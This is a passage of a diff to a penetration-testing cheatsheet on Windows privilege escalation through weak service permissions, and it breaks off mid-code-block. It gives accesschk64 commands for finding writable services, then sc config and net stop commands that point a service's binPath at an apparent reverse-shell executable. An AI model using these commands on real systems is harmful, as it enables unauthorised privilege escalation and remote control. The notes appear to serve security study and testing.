0xa1d/0xa1d.github.io/cheatsheet.md

 - Insecure service permission (binpath)

 Similar to a previous one, check with `accesschk64.exe -uwcv Everyone *` if you have RW permission on some service.
-If so, you can reconfigure service and supply malicious executable as parameter :
+You can query a specific one to get more details with `accesschk64.exe -uwcv $SERVICE`.
+You can then reconfigure service and supply malicious executable as parameter :
 ```
 sc config $SERVICE binPath= "c:\path\rev.exe"
 net stop $SERVICE